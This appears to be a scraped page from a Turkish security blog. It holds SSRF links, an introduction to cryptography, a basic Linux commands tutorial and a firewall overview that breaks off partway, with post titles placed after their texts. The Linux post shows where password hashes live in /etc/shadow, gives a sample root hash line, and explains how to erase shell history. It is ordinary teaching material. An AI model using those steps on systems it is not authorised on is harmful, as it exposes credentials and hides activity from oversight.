https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/
https://securingtomorrow.mcafee.com/mcafee-labs/server-side-request-forgery-takes-advantage-vulnerable-app-servers/

SSRF Cheatsheet : https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit

TR | SSRF ( Server Side Request Forgery ) Zafiyeti Ahmet Gürel

Kriptografi şifreleme bilimi ve sanatıdır. Günümüz dünyasında yetkilendirme, dijital imzalar ve daha birçok temel güvenlik fonksiyonlarının temelini oluşturur. Ayrıca kriptografi hayatın birbirinden farklı yüzlerinde karşılaşabileceğimiz bir alandır. Mesela kriptografi konulu bir konferansta, bilgisayar güvenliği, cebir, iktisat, adli suçlar, istatistik, çip dizaynı, yazılım optimizasyonları gibi konularla karşılaşmanız muhtemeldir.
Bahsedilen alanlardaki çeşitlilik kriptografiyi, bir çalışma konusu olmak için ziyadesiyle cazip hale getirdiğinin kanısındayım.

1. Kriptografinin Rolü

Tek başına kriptografinin rolünden bahsetmek gereksiz ve anlamı olmayan bir harekettir. Kriptografi daha büyük bir sistemin parçası olmak zorundadır. Bunu daha iyi anlamak için kriptografiyi günlük hayatta kullandığımız kilitlere benzetebiliriz. Bir kilit ancak koruduğu binayla ya da kafesle bir anlam ifade eder. Aksi halde, tek başına bir kilidin kullanışlı olduğundan bahsetmemiz mümkün değildir. Bina örneğinden devam edersek, bu binada oturan insanların kapılarını kilitlemeyi unutmaması ve anahtarı güvenli bir şekilde saklayarak hırsızlardan uzak tutması gerekir. Aynı şekilde kriptografi de, içinde bulunduğu güvenlik sisteminin ya da protokolünün küçük bir kısmını oluşturur.
Kriptografi içinde bulunduğu sistemin küçük bir parçası olsa bile, sistemin en kritik kısımlarından biridir. Kriptografi, bazı insanlara erişim vermek zorunda olduğu gibi istenmeyen insanları da bu erişimden uzak tutmak zorundadır. “İyi” ve “kötü” arasında ayrım yapmak zorundadır. İşte bu kısım kriptografi biliminin ince noktalarından birisini oluşturur. Güvenlik sistemlerinin büyük çoğunluğunu oluşturan kısımlar, tüm insanları dışarısında tutabileceğimiz duvarlara benzer. Kriptografi ise “iyi” ve “kötü” insanları ayırmak zorundadır. Görüldüğü üzere bu işlem, herkesi dışarıda tutmaktan daha zahmetli bir iştir. İşte bu yüzden kriptografi ve kullandığı diğer etmenler, bir sisteme yapılacak olan saldırının en doğal noktası konumundadır.
Ama bu durum kriptografinin, bir sistemin her zaman en zayıf noktası olduğu anlamına gelmez. Bazı durumlarda kötü bir kriptografi yaklaşımı bile bir güvenlik sisteminin diğer parçalarından daha iyi olabilir. Hepimiz filmlerde, banka kasalarını koruyan birkaç metre kalınlığında etkileyici çelik kapıları görmüşüzdür. Dijital dünyada ise bunun gibi bir kapının basit bir çadırı korumak için kullanıldığını görebiliriz. İnsanlar ise çadırın basitliğine bakmak yerine, kapının kalınlığının ne kadar olması üzerinde tartışarak vakit harcıyorlar. Siber dünyadan daha somut bir örnek vermek gerekirse herhangi bir web uygulamasındaki şifreleme anahtarının uzunluğunu tartışarak, o uygulamadaki buffer overflow zafiyetini göremeyebiliyoruz. Sonuç ise saldırgan kriptografi sistemine saldırmakla uğraşmayıp buffer overflow zafiyetini kullanarak amacına ulaşıyor. Sonuç olarak sistemin diğer parçalarının “yeterli” seviyede güvenli olması şartıyla kriptografinin asıl yararına ulaşılabilir.
Bir sistemdeki farklı zafiyetler, farklı saldırganlar için farklı yollarla yararlı olabilir. Mesela, kriptografi kısmını atlayabilen bir saldırganın tespit edilme olasılığı düşüktür. Çünkü saldırganın sisteme erişimi “iyi” ya da “muhtemel” bir erişim olarak görülecektir. Bu ayrıca saldırganın takip edilmesini de zorlaştıracaktır. Yine gündelik hayattan bir örnek vermek gerekirse, levye kullanarak eve giren bir hırsız, kapıda görülebilen bir hasar bırakırken, maymuncuk kullanan bir hırsız da bu durum söz konusu olmayacaktır. Maymuncuk kullanılan bir hırsızlığın tespit edilmesi çok daha zordur.

2. En Zayıf Halka İlkesi

“Bir sistem en zayıf halkası kadar güçlüdür.”  Büyük puntolarla yazıp bilgisayarımıza, ofise, panolara yapıştırılabilecek bir ifade değil mi sizce de?
Bu ilke, güvenli bir sistem oluşturmanın ne kadar zahmetli olduğunu gösteren ana sebeplerden birisidir. Bir zincirin diğer kısımları ne kadar sağlam olursa olsun, en zayıf halkası, kopacak olan ilk kısımdır. Bir plazadaki her ofis kapısının geceleyin kilitlendiğini düşünelim. Kulağa gayet makul ve güvenli geliyor değil mi? Ama bir problem var ki, plazada asma tavan kullanılmış. Asma tavan parçalarından birisi kaldırıldığında kilitli kapının üzerinden tırmanılıp kapı çok kolay bir şekilde aşılabilir. Başka bir açıdan düşünürsek, kilitli kapılar elbette hırsızların işini zorlaştıracaktır fakat güvenlik görevlisinin ofisleri kontrol etmesini de zorlaştıracaktır. Bu örnekte “en zayıf halka ilkesi”, kapıların kilitlenmesinin sağlayacağı etkiyi azaltmıştır. Evet, kapılar kilitlenerek aşılması zor hale getirilmiştir fakat hala tedbir almamız gereken asma tavan problemi devam etmektedir. Bu durumda “en zayıf halka” asma tavan problemidir.
Bir sistemin güvenliğini artırmak için, en zayıf halkasının güçlendirilmesi gerekir. Bunu başarabilmek içinse halkaların hepsinin bilinmesi ve hangilerinin en zayıf olduğunun tespit edilmesi gerekir. Bu tespitleri, saldırı ağacı(attack tree) kullanarak yapabiliriz.

Saldırı ağaçları, muhtemel atakları önceden görebilmek için değerli bir bakış açısı sağladığından dolayı önemlidir. Bir sistemi güvenli hale getirmek için yapılan çalışmaların ilk adımı, bu yapının ortaya çıkarılmasıdır. Aksi halde vakit ve efor kaybı kaçınılmazdır.
“En zayıf halka ilkesi” kriptografi çalışmalarını çeşitli yollardan etkiler. Mesela, kullanıcıların güçlü parolalara sahip olduğunu varsaymak her ne kadar cazip gelse de, günlük hayatta maalesef bu gerçekleşen bir durum değildir. Genelde kısa parolalar kullanılmaktadır. Parolaların ekrana yapıştırılması verilebilecek en bariz örneklerden birisidir. Böyle bir durum sistem tasarımcıları tarafından göz ardı edilemez. Bir sistem tasarımcısı olarak kullanıcılara her hafta 13 haneli rastgele oluşturulmuş parola verseniz bile, bu parolaların ekrana yapıştırılacağından emin olabilirsiniz. Bu zafiyet en zayıf halka olan kullanıcıyı daha da zayıf hale getirmektedir. Kısaca zayıf halka dışındaki diğer halkaların güçlendirilmesinin hiçbir yararı olmayacaktır.
Sistemin zayıf halkası saldırgana ve kullandığı araçlara göre de değişkenlik gösterebilir. Bunun için kriptografi bilimi, bu alanda uğraşan insanlara profesyonel paranoyaya sahip olmaya zorlayabilir.

3. Kriptografi Çözüm Değildir

Kriptografi, güvenlik problemlerine bir çözüm değildir. Çözümün bir parçası olabileceği gibi problemin de bir parçası olabilir. Bazı durumlarda kriptografi, bir problemi daha da zor hale getirerek, kriptografi kullanmanın avantajı ortadan kalkabilir.
Kimse tarafından okunmasını istemediğiniz bir dosyanız olduğunu varsayalım. Bu dosyayı basit bir şekilde istenmeyen erişimlerden koruyabilirsiniz. Diğer bir seçenek ise dosya içeriğini şifreleyip rastgele oluşturulan anahtarı koruyabilirsiniz. Dosyanızı şifreledikten sonra USB’de sakladığınızı varsayalım. USB kaybolsa bile okumak için hala anahtara ihtiyaç var. Peki anahtarı nerede saklayabiliriz? İyi bir anahtar, hatırlanmayacak kadar uzun bir anahtardır. Bazı programlar bu anahtarları diskte depolarlar. Dosyanızı sabit diskten ya da USB’den ele geçirebilen bir saldırıyı göz önüne alırsak, artık anahtarınız da tehlike altındadır. Bu saldırı anahtarınızı ve şifrelenmiş dosyanızı ele geçirerek dosyanızı okuyabilir. Artık yeni bir zafiyet noktamız var: Eğer şifrelerin rastgele oluşturma oranı düşükse ya da şifreleme işlemi güvensizse, saldırgan şifreleme işlemini kırabilir.
Kriptografi uygun yollarla sağlanmazsa sistemi güvenli hale getirmek yerine daha büyük bir problemlere yol açabilir. Yukarıdaki örnekte de bu görülebilir.
——–
Bu gerçeklemesini istediğim Kriptoloji yazı dizisinin ilk parçası… Bu ve olası diğer yazılar için yapıcı olduğunu düşündüğünüz her türlü eleştiriyi ve fikri paylaşırsanız hem keyifli hem de öğretici bir yolculukta beraber olabiliriz.

TR | Kriptografiye Giriş – 1 Furkan BUYRUKOĞLU

Yazıda temel linux komutlarını ele alacağız. Komutların akılda kalabilmesi için komutları deneye deneye ilerlemenizi tavsiye ederim.

**Bu yazı 2 part halinde yayınlanacaktır.

Bazı komutların çıktılarının sorunsuz alınması için root yetkisiyle komutları denemeniz tavsiye edilir

Linux Nedir?

Linux veya GNU/Linux (telaffuz: Lin-uks); Linux çekirdeği ve çeşitli GNU araçları üzerine kurulmuş işletim sistemlerinin genel adıdır. Linux çekirdeği ve GNU araçları açık kaynak kodlu, özgür ve ücretsizdir. Kaynak kodları GNU Genel Kamu Lisansı çerçevesinde özgürce dağıtılabilir, değiştirilebilir ve kullanılabilir. Linux ismi ilk olarak Linus Torvalds tarafından yazılan ve 5 Ekim 1991’de duyurusu yapılan Linux çekirdeğinden gelmektedir.*

*Kaynak: Vikipedia

Shell (Kabuk)

Shell kullanıcıdan alınan komutları kernele iletir. Günümüzde genellikle bash kullanılmaktadır. Sistemimizdeki shell programını öğrenmek için;

echo $SHELL

Ortam Değişkenleri

Terminale girdiğimiz komutun çalıştırılabilir bir hizmet ise hangi dizinler altında aranacağını görmek için;

echo $PATH

Yardım Alma

Help

[komut] --help

Man

man [komut]

Dağıtım Adı Öğrenme

lsb_release -a

Sistemle İlgili Bilgi Alma

dmidecode

dmidecode --type [ ]

bios , system , baseboard , chassis , processor , memory , cache , connector , slot  parametreleriyle sistem hakkında bilgi alabiliriz.

Donanım hakkında bilgi almak için;

lshw

Kernel Versiyonu Öğrenme

uname  komutu sistem hakkında bilgi toplamak için kullanılır -v  -n  gibi parametrelerle kullanılabilir -a  komutu ile tüm bilgileri görmek için kullanabiliriz.

uname -a

Disk Bölümlerini Görme

fdisk  komutu disk yöneticisi aracını çalıştırmaktadır. Sisteme bağlı olan bölümleri görüntülemek için -l  parametresi ile birlikte kullanılabilir.

fdisk -l

Uptime

uptime  komutu bize sistemin aktif olarak çalışmakta olduğu süreyi kaç kullanıcının giriş yaptığını ve sistem saatini gösterir.

uptime

Kullanılan Bellek Miktarı

free  komutu bize sistemin ram durumunu göstermektedir. default olarak kilobayt cinsinden değerleri vermektedir. -m  ile megabayt, -b  ile byte ve -g  ile gigabayt cinsinden değerleri vermektedir.

free -m

Takvim

cal

Dizinler Arasında Gezme ve İçeriğini Listeleme

Dizine Gitmek İçin;

cd /[dizin]

Üst dizine geçmek içincd ..  komutu kullanılabilir yada dizinler arasında geçiş yapmak için cd –  komutu kullanılır.

İçeriği Listeleme

ls

-l  ve -la  ekleyerek dosya ve dizinler hakkında daha detaylı bilgiye ulaşabilirsiniz.(İzinler, değiştirilme tarihi, değiştirilme saati, dosya boyutu)

Bulunulan Dizini Öğrenme

pwd

Gizli Dosya ve Dizinleri Görüntülemek İçin;

ctrl + h

gizli dosya veya dizin yaratmak için adını .[dizin_adı]  şeklinde yapabiliriz.

Terminalde Pratik Metodlar

• Konsolu temizlemek için clear  komutu yerine ctrl+L  kombinasyonu kullanılabilir.
• Baş tarafında hata yaptığımız komutun başına dönmek için ctrl+U  komutundan yardım alınabilir.
• Çalışan komutu durdurmak için ctrl + C  komutundan yardım alabiliriz.
• Terminalden çıkmak için exit  komutu yada ctrl +D  kombinasyonunu kullanabiliriz.

History

Terminalde daha önce kullandığımız komutları listelemek için;

history

• Son kullandığımız komutu tekrar kullanmak için !!  yazarak aynı komutu tekrar kullanabiliriz.
• Kullandığımız komutlar dan örneğin c ile başlayan komutu kullanmak için !c  komutunu kullanabiliriz.
• Hatırlayamadığımız komut için örneğin !ca  komutundan yardım alabiliriz.
• Kullandığımız komutların kaç tanesinin saklandığını öğrenmek için echo !HISTSIZE  komutunu kullanırız. Saklanan komut sayısını değiştirmek için .bashrc  dosyasının içinde HISTSIZE  değişkenini düzenleyerek değiştirebiliriz.
• Kullandığımız komutlarını kaydını silmek için .bash_history  dosyasını silebiliriz veya history -c  komutu ile geçmişi temizleyebiliriz.

Terminalde Birden Fazla Komut Kullanma

[komut]  && [komut]

[komut] ; [komut]

[komut] || [komut]   gibi kullanıp ||  parametresinden yararlanırsak ilk komut başarısız olursa ikici komutu çalıştırır.

Komut Tamamlama

• Terminalde bir komutun ilk bir kaç harfini yazıp tab  tuşuna basarsak komut tamamlanacaktır. tab  tuşuna iki kere basarsak girdiğimiz harflerle başlıyan komutlar listelenecektir.

Sistemi Açma-Kapatma-Yeniden Başlatma

• 0: Hiçbir servisin çalışmadığı seviye
• 1:Tek kullanıcı modu, ağ servisleri çalışmaz
• 2:Ağ desteği olmadan çoklu kullanıcı modu
• 3:Ağ destekli çok amaçlı çalışma seviyesi
• 4:Kullanılmaz, kullanıcı tarafından özel olarak tanımlanabilir
• 5:Grafiksel kullanıcı arayüzünün çalıştığı seviye
• 6: Sistemi yeniden başlatma seviyesi

Seviyeler Arası Geçiş İçin

init [seviye]

Sistemi Beklemeden Kapatma

shutdown -h now

Belli Bir Süre Sonra Kapatma

shutdown -h now+[süre]

shutdown  komutunu parametre eklemeden kullandığımızda sistem ini1  yani Single User moda geçicektir.

Sistemi Yeniden Başlatma

reboot

Yazılımların Çalışma Seviyelerinin Kontrolü

• Sistemde hangi seviyede hangi scriptlerin çalıştığını kontrol etmek için /etc  dizini altında rcx.d  dosyası içerisinde bulunur. x  çalışma seviyesini temsil etmektedir. rc5.d  servisin 5. seviyede çalıştığını göstermektedir.

5. seviyede çalışan servisleri incelersek;

K  harfiyle başlayan servisler o seviyede durudulacak servisleri göstermektedir. S  ile başlayan servisler o seviyede başlatılacak olan servisleri göstermektedir.

Sanal Konsollar

• Linux da çalışırken ctrl+alt+f1….f6  ya kadar 6 sanal konsolda çalışabilirsiniz. Konsollar arası geçiş için ctrl+alt  tulşarına basak hangi sekmeye gideceksek onu seçebiliriz, tekrar grafik arayüzüne dönmek için ctrl+alt+f7  tuşlarına basarak dönebilirsiniz.

Servislerin Başlatılması ve Durdurulması

Sistemimizle alakalı servisler betikler /etc/init.d  altında bulunmaktadır.

Servis Durumu Sorgulama

/etc/init.d/[servis] status

service [servis_Adı] status

Servislerin Başlatılması

/etc/init.d/[servis] start

service [servis_Adı] start

Servislerin Sonlandırılması

/etc/init.d/[servis] stop

service [servis_Adı] stop

Servislerin Yeniden Başlatılması

/etc/init.d/[servis] restart

service [servis_Adı] restart

• Debian tabanlı sistemler de server programlarını tasksel  komutu ile grafik arayüze geçerek istediğimiz servisleri buradan kurabiliriz.

Süreçler

Süreç sistemdeki çalışır durumdaki programlara denir. ps  komutu ile süreçleri görüntüleye biliriz.

ps –help a  komutu ile kullanılabilecek parametreleri inceleyebiliriz.

Süreçlerin Listelenmesi

ps aux

ps alx

• Her sürecin PID (process id)  denilen bir iletişim numarası vardır. Servisler PID  numarası üzerinden haberleşir.
• top  komutu ile tüm süreçleri anlık olarak takip etmemizi sağlar.

• Süreçleri pstree  komutu ile ağaç yapısı halinde inceleyebiliriz.

Süreç Sonlandırma

• Süreçlerin pid numarasını öğrendikten sonra süreci sonlandırmak için;

kill [pid_numarası]

• Birden fazla süreçle çalışan servisleri sonlandırmak için;

kill -9 [pid_numarası]

killall [servis_adı]

Servis PID Numarası Öğrenme

ps aux | grep [servis_adı]

pgrep [servis_adı]

Root Kullanıcısına Ait Süreçleri Listelemek İçin;

pgrep -lu root

Kullanıcı İşlemleri

passwd

• Linux sistemlerde kullanıcılarla ilgili bilgiler yer alır.

/etc/passwd

shadow

• Linux sistemlerde kullanıcı parolaları şifrelenmiş halde bulunur.

/etc/shadow

Örnek shadow dosyasını incelersek;

root:$6$ttZw7OIi$LjmBdapfyNA6kKrXnAcF1xkgikQCGcLN3hsNrwZmEZkVNLPmoRqD9KYF5TngV60FAlecJine.Qv5v28uO2p8z.:15944:0:99999 :7:::

• İlk iki $ işareti arası hangi hashleme algoritmasının kullanıldığını gösterir.
  • 1 ise MD5
  • 2 ise BlowFish
  • 5 ise SHA256
  • 6 ise SHA512

6

• İkinci ve üçüncü $ işaretleri arası salt değeridir(hashil değer)

ttZw7OIi

• Son kalan kısımda parolanın şifrelenmiş değeridir.

LjmBdapfyNA6kKrXnAcF1xkgikQCGcLN3hsNrwZmEZkVNLPmoRqD9KYF5TngV60FAlecJine.Qv5v28uO2p8z.

issue

Kullanıcılar sisteme giriş yaparken issue  dosyasındaki mesaj ekranda gözükür bunu değiştirebiliriz.

/etc/issue

login

• Sistem açılırken Kullanıcı Adı girildikten sonra login betiği çalıştırılır ve parola istenir. Parola doğru ise kullanıcıya ait kabuk çalıştırılır.

man login

komutu ile login e ait dokümantasyonu görüntüleyebilirsiniz.

• Her loginden sonra gösterilecek metin alltaki dizinde bulunur bunu isteğimize göre değiştirebiliriz.

/etc/motd

• Sisteme giriş yapmış tüm kullanıcılar alttaki dizindeki dosyaya 2 lik sisteme göre kaydedilir. Bu dosya sistem her yeniden başlatıldığında sıfırlanır.

/var/run/utmp

• Bu dosyayı normal text editörleriyle okuyamayacağımız için strings komutuyla dosyayı açabiliriz.

strings /var/run/utmp

Sisteme Kullanıcı Ekleme

adduser [kullanıcı_adı]

useradd [kullanıcı_adı]

Kullanıcı Şifresi Değiştirme

passwd [kullanıcı_adı]

Kullanıcı Hesabı Kitleme

usermod -L [kullanıcı_adı]

Kullanıcı Hesabı Aktif Hale Getirme

usermod -U [kullanıcı_adı]

Sisteme Bağlı Kullanıcıları Listeleme

who

Sisteme Giriş Yapılan Kullanıcı Adı Öğrenme

whoami

Kullanıcı Parola Geçerlilik Süresi Değiştirme

chage -E [yıl/ay/gün_formatında_tarih] [kullanıcı_adı]

Kullanıcı Yetkileriyle İşlem Yapma

su [kullanıcı adı]

Host Adı Öğrenme

/etc/hostname

Kullanıcı Hesabından Çıkış

exit

Root Yetkisine Yükselme

su root

Kullanıcı Hesabı Silme

userdel

deluser

userdel -r [kulanıcı_adı]

Yazının devamı için: TR | Temel Linux Komutları – 2

TR | Temel Linux Komutları – 1 Mustafa Kaan Demirhan

Firewall Nedir?

Firewall,  ağa  gelen, giden paket trafiğini kontrol eden, ağ sistemlerimizi internet ortamından  gelebilecek  her  türlü tehlikeye karşı koruyan  güvenlik sistemidir.  Her türlü tehlike derken anlatmak istediğimiz virüsler, zararlı yazılımlar, Truva yazılımları ve olumsuz içerikli web siteleridir.

Güvenlik duvarları kullanılarak, gelen ve giden ağ trafiği kontrol altına alınarak, bilgisayar ve bilgisayar ağlarına istenmeyen ve yetkisiz erişimler engellenmiş olur. Evimizde veya ofisimizde kullandığımız bilgisayarlarda  firewalllar sayesinde kilit noktaları oluşturarak kendimizi güvence altına almış oluruz. Kısaca yerel ağımızı internet ağından korumuş oluruz.

Firewall, donanımsal ve yazılımsal olarak ikiye ayrılabilir. Yazılımsal firewall daha çok ev kullanıcıları içinken donanımsal firewall ağ sistemlerini korumak için kullanılır. İkisini maliyet, performans ve güvenlik  bakımından  karşılaştırdığımızda donanımsal firewall daha üstündür.

Donanımsal Firewall Nedir?

Donanımsal firewall’lar router, modem vb. donanıma entegre  edilmiş  firewall’lardır. Yalnızca  güvenlik  duvarı özelliği ile kullanılan geniş bantları karşılayabilen, OSI  1-2-3-4. katmanlarında çalışabilen güvenlik çözümleridir. Tipik olarak paket filtreleme yöntemini  kullanırlar.

Avantajları

• Tek bir firewall tüm ağınızı,dolayısıyla ağınızdaki bütün bilgisayarları koruma altına alır.
• Bilgisayarınızda çalışmadığı için yani çevresel donanım olduğu için sisteminizin performansını ve hızını etkilemezler.
• Donanımsal firewall’lar geniş bant kullanan kurumlar için daha verimlidir.
• Donanımsal firewall’lar yazılımsal firewall’lar gibi zararlı yazılımlar(virüs, kurtçuk vb.) kolayca devre dışı bırakılamazlar.
• Bir kurum için her bir  bilgisayar için lisanslı firewall almaktansa bir tane donanımsal firewall kullanmak maliyeti önemli ölçüde düşürür.
• Disk kullanmadıkları için arıza oranı da az olur.
• Genelede daha az yer kaplarlar, daha az elektirik sarf ederler ve daha sessiz olurlar.

Dezavantajları

• Kullanım alanlarına ve tiplerine göre oldukça pahalı olabilirler.
• Yeni kullanıcılar için donanımsal firewall ayarını yapmak oldukça zor olabilir.
• Donanımsal firewall’lar ağınızdan çıkan veriyi güvenli olarak nitelendirdikleri için, ağınız da bulunan zararlı bir yazılımın internete bağlanmasına müsade ederler.

Yazılımsal Firewall Nedir?

Bu çeşit firewall herhangi bir bilgisayara yazılım olarak rahatça kurulabilir.Bilgisayar gelen verinin istenen  veri olup olmadığını kontrol ederler ve çoğu zaman bilgisayardan çıkan verinin kontrol edilebilmesi  için ayarlanabilirler

Avantajları

• En iyi yazılımsal Firewall’lar  bile Donanımsal Firewall’lara göre oldukça ucuz olduğundan dolayı az sayıda bilgisayar içeren ağlar için idealdirler.
• Kullanımı kolaydır.Kurulumu birkaç tıklamayla tamamlanıp ayarlarını yapmak da kolaydır.
• Hangi uygulamanın internete erişim hakkı olduğunu belirleyebilirsiniz.Kendi mail sunucularını kuran zararlı yazılımlar(MyDoom) gibi potansiyel senaryolarda donanımsal firewall’lara göre çok daha güvenlidir.Bu tür yazılımlar kendi mail sunucusunu kurduğu için,donanımsal firewall’lar bu yazılımları güvenli olarak algılayıp bu zararlı yazılımların dışarıya olan veri trafiğini engellemezler.
• İstenilen her yere bilgisayar ile birlikte taşınabilir.

Dezavantajları

• Yazılımsal oldukları için sisteminizin belleğini,işlemcisini vb kaynakları kullandıkları için performans hızını düşürürler
• Geniş bir ağınız varsa her bilgisayar için lisanslı firewall kullanılacağından maliyet yüksek olabilir.
• Yazılımsal firewall’lar IP adresinizi maskeleymezler bunun yerine kullanılmayan portları kapatırlar.

Yazılımsal Firewall’e Göre Donanımsal Firewall

• Maliyet(TCO): Maliyetleri nettir. Kutu ve güncelleme fiyatları vardır.
• Performans: Firewalla Özel tasarlandığı için donanım performansları yüksektir.Ayrıca genel bir işletim sistemi olmadığından daha hızlıdır.Bazı ürünlerde birçok işlem donanım tabanlı çözüldüğünden yüksek performans sağlar(ASIC).
• Güvenlik: Firewall özel tasarlandığı için güvenlik çok yüksektir.Sadece belli portlar açıktır.
• Yetenek: Tüm donanım ve yazılım altyapısı ürünün kendine ait olduğundan çok yetenekli özellikler eklenebilmiştir.(PKI,LDAP,AD vb desteği gibi)
• Kurulum: Kurulumu kolaydır. Genelde tek bir arabirim üzerinden işlem yapılabilir.
• Bakım: Güncelleme kolaydır. Tek bir firmware yüklenir.
• Yükseltme: Genelde yükselteme yapılmamaktadır  bazı modellerde ram yükseltilebilmektedir.
• Entegrasyon: Üzerinde taşıdığı  tüm servisler(AV, Firewall,IDS, IPS, Filtering vb) birbirine entegre çalışır.
• Lisans : Genelde lisans kullanıcı bazlı değildir.

Firewall’lar Nasıl Çalışır?

Firewall paket filtrelemesi yaparak hangi paketlerin duvardan geçip geçemeyeceğine karar verir. Bu filtreleme ile bazen veri akışı engellenirken bazense veri trafiği düzenlenir veya sınırlandırılır. Bazı firewallar e-mail trafiğine izin verirken bazıları da problem olabilecek servisleri(FTP,NFS, X-Windows gibi ) bloke eder. Ayrıca sisteme modem ile bağlantı kurulmak istendiğinde firewall bu bağlantıyı kontrol ederek izleyebilme imkanına da sahiptir. Bunun yanında, kullanıcı şifre ve yetkilerini tanımlayarak firewallar bu bilgileri ağ trafiğinde gizlemiş olur.

Firewalların avantajları olduğu gibi dezavantajları da vardır. Bunların başında kullanıcıların çok kullanılan servislere erişiminin kısıtlanması gelmektedir. Bu servisler telnet, ftp, nfs gibi servislerdir. Telnet güvensiz bir protol olduğu için firewall tarafından engellenir. Ancak internet ağı üzerindeki çok kullanıcılı bir makineye uzaktaki başka bir makineden bağlanmak için geliştirilmiştir. Aynı şekilde ftp de dosya ve komut transferi için değişik portlar kullandığı için firewall tarafından engellenir. Fakat bu kısıtlama, kullanıcı(host) ihtiyacına göre güvenlik şartlarını iyi bir şekilde planlayarak kaldırılabilir.

Bazı durumlarda firewall kullanılsa bile hacklenme olasılığı vardır. Böyle durumlarda risk analizi yapılmalıdır. Bunu için Kerberos gibi alternatif çözümler oluşturulabilir.

Firewall trojan türü data içeren veri paketlerine karşı ağı koruyamaz. Hackerlar backdoor oluşturan programlar aracılığıyla saldırı gerçekleştirdiğinde firewall bir koruma sağlayamaz. Burada istemci, sunucudaki erişim kontrollerini değiştirerek gizli dosyaları açabilen programları server tarafında çalıştırır. Burada firewallın truva yazılımlarını engellemeye çalışması ağ izleme yani Network Monitör özelliğidir.

Firewall tarafından korunan ağa sınırsız modem erişim izni verilirse, saldırganlar bu güvenlik duvarını geçebilirler. Güvenli zannettiğimiz ağlardaki slip ve ppp(modem hızları) bağlantıları diğer networklerle bağlantı kurabilecek backdoorlardır. Buradan anladığımız gibi firewallar ağdan gelen tehditlere karşı bir koruma sağlayamaz.

Firewallar virüsler için de koruma sağlayamaz. Çünkü virüsler kolaylıkla sıkıştırılıp, şifrelenebilirler. Tüm yazılım bileşenlerini denetim altına alarak, zararlı kod içerip içermediklerini sürekli kontrol ederler. Bu özelliğiyle bileşenleri gözleme yani Component Monitör özelliğine sahiptir.

Firewallın sistemimizde çalışan programları kontrol ederek firewall izni olmayan hiçbir programın çalışmasına izin vermemesi de uygulama izleme yani Application Monitör özelliğidir.

Yazılımın uygulama davranışlarını denetim altına alarak sürekli olarak yazılımı test edip uygulamanın en iyi şekilde çalışmasını sağlaması ise firewallın uygulama davranış analizi yani Application Behaviour Analysis özelliğidir.

Güvenlik duvarı, belirli trafik türlerinin engellenebilmesini sağlayarak tüm gelen ve giden trafiği izler. Bunu ise aşağıdaki ölçütlere dayanarak yapar.

• Yön(gelen veya giden)
• Protokol(TCP/UDP/ICMP)
• Hedef bağlantı noktaları
• Hedef bilgisayar

Şimdi firewall türlerinin yapısını (proxy ve packet filtering) inceleyelim.

PACKET FILTERING (Veri paketleri Filtresi)

IP paketlerini filtreleme, yönlendiriciler arasında geçen veri paketlerini süzmek için geliştirilmiş bir router kullanılarak yapılır. Bu sayede kaynak(source) – hedef(destination) IP adresleri ve TCP/UDP kriterlerine göre IP paketlerinin trafiği süzülebilir.

Filtreleme sayesinde ağdaki veya ana makinedeki bağlantılar veya belirli portlar bloke edilmiş olur. IP adres filtresine, TCP ve UDP port filtresi ekleyerek sistem daha esnek hale getirilebilir. Örneğin bir ağ, firewall’a bağlı olmayan makinelere giren bütün bağlantıları engelleyebilir ya da bir sistem için telnet veya FTP bağlantıları serbest iken bir diğeri için sadece SMTP bağlantısı açık olabilir. TCP veya UDP portlarının süzülmesi yolu ile bu tür seçimlerin uygulanması, paket filtreleme kapasitesine sahip host yoluyla veya paket filtreleme yönlendiricisi tarafından yapılır. Ancak bu yönlendirmeler yapılırken veri transferi esnasında karşılaşılacak problemler paket filtrelemenin dezavantajıdır.

Paket filtrelemeyi destekleyen yönlendiricilere perdeleyici yönlendiriciler (screening routers) de denilmektedir. Örneğin, Cisco yönlendiriciler, paket filtrelemesi için basit bir yapı kullanmaktadırlar. Her bir ağ ara yüzü, bir izin grubuna dâhil edilir ve her grup için izin listesi tanımlanır.

PROXY SERVER (Vekil Sunucu- Application Getaway)

Uygulama geçidi olarak da bilinir. Vekil sunucular yerel ağ ile dış dünya arasındaki ilişkiyi sağlayan getaway(yardımcı geçit) sistemleridir ve ağlar arası trafiği kontrol etmek için kullanılır. Aynı zamanda kullanıcı erişimleri için denetleme ve destek de sağlar. Bir FTP proxy serverı, FTP protokolü üstünden giriş ya da çıkışları denetleyecek ve bloke edecek şekilde konfigüre edilebilir. Vekil servisleri kısaca verinin bir firewalla gönderildikten sonra alınması olayıdır.

Avantajı kullanımının kolay olmasıdır. Ama Proxy’ler gibi erişim kontrolüne ve özel protokol kullanma olanağına sahip değildir.

Bir Proxy servisi sizden aldığı “internet’ten bilgi alma” isteklerini yürütür ve sonucu yine size iletir. Ancak aynı anda, bu bilgilerin bir kopyası da (cache), bu Proxy sunucusu üzerinde tutulur. Böylece bir dahaki erişimde kullanıcının istediği bilgiler, doğrudan ilgili siteden değil de Proxy servisinden gelir. Dolayısıyla, iletişim daha hızlı olmuş olur.

Firewallar ön tanımlı bir konfigürasyonla gelir fakat belli başlı filtreleme kuralları vardır. Yönetici bu kuralları değiştirebilir. Kurallar aşağıdaki gibidir.

• Ip adresleri,
• Alan adları(domain names)
• Protokoller
• IP,TCP,http,FTP,UDP,ICMP,SMTP,SNMP,TELNET
• Portlar

Biraz da firewall örneklerine değinelim:

• Paket filtreleme yapan Firewall türü – Packet Filtering Firewall
• Çift taraflı Geçit tipindeki Firewall türü – Dual-homed gateway firewall
• Perdelenmiş kullanıcı tipindeki Firewall türü – Screened host firewall
• Perdelenmiş alt ağ tipindeki Firewall – Screened subnet firewall

1)Packet Filtering Firewall

Bu firewall türünden bahsetmiştik. Kısaca bir paket, güvenlik duvarından geçtiği sırada eğer başlık bilgisi, güvenlik duvarı tarafından daha önceden tanımlanmış olan firewall paket filtresi ile eşleşirse paket atılır veya kaynağa hata mesajı gönderilir, paketin var olan ağ akışının bir parçası olup olmadığına bakılmaz.

2)Dual-Homed Gateway Firewall

